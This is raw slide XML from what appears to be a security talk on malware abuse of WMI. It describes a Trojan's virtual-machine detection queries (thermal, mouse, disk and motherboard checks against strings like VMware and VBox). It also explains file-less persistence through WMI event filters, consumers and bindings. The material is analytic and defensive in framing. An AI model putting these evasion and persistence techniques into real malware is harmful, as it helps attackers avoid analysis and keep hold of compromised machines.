                        <a:rPr lang="en-CA" sz="1200" b="1" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>SELECT * FROM MSAcpi_ThermalZoneTemperature</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-CA" sz="1100" b="1" dirty="0">
                        <a:effectLst/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr fontAlgn="t"/>
                      <a:r>
                        <a:rPr lang="en-CA" sz="1100" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr fontAlgn="t"/>
                      <a:r>
                        <a:rPr lang="en-CA" sz="1100" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>The Trojan will specifically attempt to get the CurrentTemperature value from this object and will check to see if the attempt results in an error that contains the word supported. This is meant to find the result of Not supported, which is the result if run in a virtual machine.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-CA" sz="1100" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="3A464E"/>
                        </a:solidFill>
                        <a:effectLst/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="31270" marR="31270" marT="15635" marB="15635"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3554381705"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="970524">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr" fontAlgn="t"/>
                      <a:r>
                        <a:rPr lang="en-CA" sz="1100" b="1" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>Mouse Pointer Check</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="31270" marR="31270" marT="15635" marB="15635" anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr fontAlgn="t"/>
                      <a:r>
                        <a:rPr lang="en-CA" sz="1100" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>The Trojan will perform the following WMI query:</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr fontAlgn="t"/>
                      <a:r>
                        <a:rPr lang="en-CA" sz="1100" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr fontAlgn="t"/>
                      <a:r>
                        <a:rPr lang="en-CA" sz="1200" b="1" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>Select * from Win32_PointingDevice</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-CA" sz="1100" b="1" dirty="0">
                        <a:effectLst/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr fontAlgn="t"/>
                      <a:r>
                        <a:rPr lang="en-CA" sz="1100" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr fontAlgn="t"/>
                      <a:r>
                        <a:rPr lang="en-CA" sz="1100" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>The Trojan will check the Caption, Description, HardwareType, InfSection, Manufacturer and Name fields in the results for the string VMware, Virtual, VBox, VM or Oracle.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-CA" sz="1100" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="3A464E"/>
                        </a:solidFill>
                        <a:effectLst/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="31270" marR="31270" marT="15635" marB="15635"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1904220222"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="813647">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr" fontAlgn="t"/>
                      <a:r>
                        <a:rPr lang="en-CA" sz="1100" b="1" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>Hard Disk Check</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="31270" marR="31270" marT="15635" marB="15635" anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr fontAlgn="t"/>
                      <a:r>
                        <a:rPr lang="en-CA" sz="1100" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>The Trojan will perform the following WMI query:</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr fontAlgn="t"/>
                      <a:r>
                        <a:rPr lang="en-CA" sz="1100" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr fontAlgn="t"/>
                      <a:r>
                        <a:rPr lang="en-CA" sz="1200" b="1" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>Select * from Win32_DiskDrive</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr fontAlgn="t"/>
                      <a:r>
                        <a:rPr lang="en-CA" sz="1100" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr fontAlgn="t"/>
                      <a:r>
                        <a:rPr lang="en-CA" sz="1100" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>The Trojan will check the Caption and Model fields in the results for the strings Virtual, VMWare, VM, VBox or Oracle.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-CA" sz="1100" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="3A464E"/>
                        </a:solidFill>
                        <a:effectLst/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="31270" marR="31270" marT="15635" marB="15635"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="387655878"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="813647">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr" fontAlgn="t"/>
                      <a:r>
                        <a:rPr lang="en-CA" sz="1100" b="1" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>Motherboard Check</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="31270" marR="31270" marT="15635" marB="15635" anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr fontAlgn="t"/>
                      <a:r>
                        <a:rPr lang="en-CA" sz="1100" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>The Trojan will perform the following WMI query:</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr fontAlgn="t"/>
                      <a:r>
                        <a:rPr lang="en-CA" sz="1100" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr fontAlgn="t"/>
                      <a:r>
                        <a:rPr lang="en-CA" sz="1200" b="1" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>Select * from Win32_BaseBoard</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr fontAlgn="t"/>
                      <a:r>
                        <a:rPr lang="en-CA" sz="1100" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr fontAlgn="t"/>
                      <a:r>
                        <a:rPr lang="en-CA" sz="1100" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>The Trojan will check the Manufacturer and Product fields in the results for the strings VMware, Virtual, VBox, VM or Oracle.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-CA" sz="1100" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="3A464E"/>
                        </a:solidFill>
                        <a:effectLst/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="31270" marR="31270" marT="15635" marB="15635"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3141558874"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4191982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a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:latin typeface="Rockwell" panose="02060603020205020403" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>WMI</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5430645" y="1427356"/>
            <a:ext cx="5514944" cy="4521809"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>File-less Persistence</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Use of system components to maintain foothold after initial compromise</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Two methods recently becoming more commonly abused by attackers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" strike="sngStrike" dirty="0"/>
              <a:t>Windows Registry</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>WMI Eventing</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5BE41D77-DF15-9C4F-A364-410B9110173A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1352240" y="1839631"/>
            <a:ext cx="3568559" cy="3960813"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1518878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86239" y="205923"/>
            <a:ext cx="9905998" cy="1478570"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:latin typeface="Rockwell" panose="02060603020205020403" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>WMI Eventing</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939814" y="1516565"/>
            <a:ext cx="6999293" cy="3902928"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-CA" dirty="0"/>
              <a:t>A WMI event subscription is a method of subscribing to certain system events. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-CA" sz="2000" dirty="0"/>
              <a:t>Example: New Process</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-CA" dirty="0"/>
              <a:t>WMI eventing can be used to action on almost any operating system event.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-CA" dirty="0"/>
              <a:t>WMI Eventing comes in two flavours.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-CA" sz="2000" dirty="0"/>
              <a:t>Temporary WMI Event Subscription</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-CA" sz="2000" dirty="0"/>
              <a:t>Permanent WMI Event Subscriptions</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Content Placeholder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8BB20EEA-B5CD-384A-8BD3-BA8AF14D2BE9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph sz="half" idx="2"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8416540" y="1527715"/>
            <a:ext cx="2906708" cy="3992137"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3662979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1410" y="183667"/>
            <a:ext cx="9905998" cy="1082326"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:latin typeface="Rockwell" panose="02060603020205020403" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>WMI Eventing</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944462" y="1161784"/>
            <a:ext cx="7196238" cy="3992137"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>1. Event Filter</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-CA" sz="2400" dirty="0"/>
              <a:t>An Event Filter is a WQL query that outlines the event of interest. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-CA" dirty="0">
              <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-CA" dirty="0">
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>SELECT * FROM __InstanceCreationEvent WITHIN 10 WHERE TargetInstance ISA "win32_process" AND TargetInstance.name like "%chrome%”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0">
              <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Content Placeholder 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8A84FE22-0814-4B40-B8C8-3B0CB9277A91}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph sz="half" idx="2"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8140700" y="1265993"/>
            <a:ext cx="2920521" cy="3541712"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3254850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1410" y="183667"/>
            <a:ext cx="9905998" cy="1082326"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:latin typeface="Rockwell" panose="02060603020205020403" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>WMI Eventing</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944462" y="1161784"/>
            <a:ext cx="7196238" cy="3992137"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-CA" dirty="0">
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>SELECT * FROM __InstanceCreationEvent WITHIN 10 WHERE TargetInstance ISA "win32_process" AND TargetInstance.name like "%chrome%”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-CA" dirty="0">
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-CA" sz="2800" dirty="0">
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>__</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="2800" dirty="0" err="1">
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>InstanceCreationEvent</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="2800" dirty="0">
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> : Log File</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-CA" sz="2800" dirty="0">
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>WITHIN: Keyword for Polling Interval</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-CA" sz="2800" dirty="0" err="1">
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>TargetInstance</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="2800" dirty="0">
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>: Keyword for Instance</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Content Placeholder 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8A84FE22-0814-4B40-B8C8-3B0CB9277A91}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph sz="half" idx="2"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8140700" y="1265993"/>
            <a:ext cx="2920521" cy="3541712"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3946962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blinds(horizontal)">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blinds(horizontal)">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1410" y="183667"/>
            <a:ext cx="9905998" cy="1082326"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:latin typeface="Rockwell" panose="02060603020205020403" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>WMI Eventing</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944462" y="1161784"/>
            <a:ext cx="7196238" cy="4254278"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>2. Event Consumer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-CA" sz="2400" dirty="0"/>
              <a:t>An Event Consumer is an action to perform upon triggering an event.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-CA" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-CA" sz="2200" dirty="0"/>
              <a:t>ActiveScriptEventConsumer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-CA" sz="2200" dirty="0"/>
              <a:t>CommandLineEventConsumer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-CA" sz="2200" dirty="0"/>
              <a:t>LogFileEventConsumer </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-CA" sz="2200" dirty="0"/>
              <a:t>NTEventLogEventConsumer </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-CA" sz="2200" dirty="0"/>
              <a:t>SMTPEventConsumer </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2200" dirty="0">
              <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Content Placeholder 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1D6D40D3-96EC-5948-A526-2869653A47A8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph sz="half" idx="2"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7975168" y="1265993"/>
            <a:ext cx="3072240" cy="3901970"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2648953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linds(horizontal)">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linds(horizontal)">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blinds(horizontal)">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blinds(horizontal)">
                                      <p:cBhvr>
                                        <p:cTn id="3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1410" y="183667"/>
            <a:ext cx="9905998" cy="1082326"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:latin typeface="Rockwell" panose="02060603020205020403" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>WMI Eventing</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944462" y="1161784"/>
            <a:ext cx="7196238" cy="4254278"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>3. Filter to Consumer Binding</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-CA" sz="2400" dirty="0"/>
              <a:t>Filter to consumer Binding is the registration mechanism that binds a filter to a consumer.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Content Placeholder 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2BAAD6D0-B502-3041-8811-59B47592BB19}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph sz="half" idx="2"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8337648" y="1265993"/>
            <a:ext cx="2239612" cy="3541712"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
